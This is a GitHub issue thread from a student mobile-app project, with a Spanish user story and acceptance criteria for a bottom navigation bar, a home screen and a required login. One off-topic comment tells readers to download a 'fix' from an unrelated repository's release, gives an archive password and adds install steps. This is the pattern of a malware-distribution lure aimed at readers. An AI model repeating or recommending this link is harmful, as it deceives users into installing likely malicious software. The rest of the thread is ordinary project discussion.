### ISSUE TITLE
#US01 "Como usuario quiero una aplicación de navegación facil para encontrar rápidamente las características que quiero utilizar"

### ISSUE THREAD

**Issue by Alcario** [Proyecto-integrador-ISPC-2024/proyecto-integrador-mobile-2024#8]
Criterios de aceptación:

- La aplicación contiene un menú de navegación que permite acceder a las diferentes características de sí misma para hacer la navegación más fluida.
- Debe haber un menú de navegación (bottom Navigation Bar) claramente visible en las pantallas para acceder fácilmente mediante un ‘tap’ a todas las opciones de la tienda.
- El usuario podrá visualizar la barra de navegación durante toda la navegación de la aplicación y así podrá acceder a las actividades de contacto con la empresa, visualización de productos y visualización de su perfil cuando lo requiera.
- La aplicación tiene una pantalla principal y se observa una vista de presentación de la tienda (home).
- Debe haber una pantalla de inicio con una vista de presentación de la tienda y sus productos.
- Se ingresa a la Tienda posteriormente a iniciar sesión que muestra algunos productos que ofrece la tienda mediante un scroll horizontal.
- La aplicación no permite el acceso a sus características si el usuario no inicia sesión con su cuenta.
- Si el usuario no está autenticado y autorizado, la navegación debe estar deshabilitada en todas las actividades de la aplicación.
- Previo a mostrarse otras pantallas de la aplicación, el usuario tiene un formulario de inicio de sesión.

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bit-rec98** [comment]
La aplicación contiene las características adecuadas al mismo tiempo que cumple las normas de accesibilidad para poder ofrecer una navegación intuitiva al usuario.
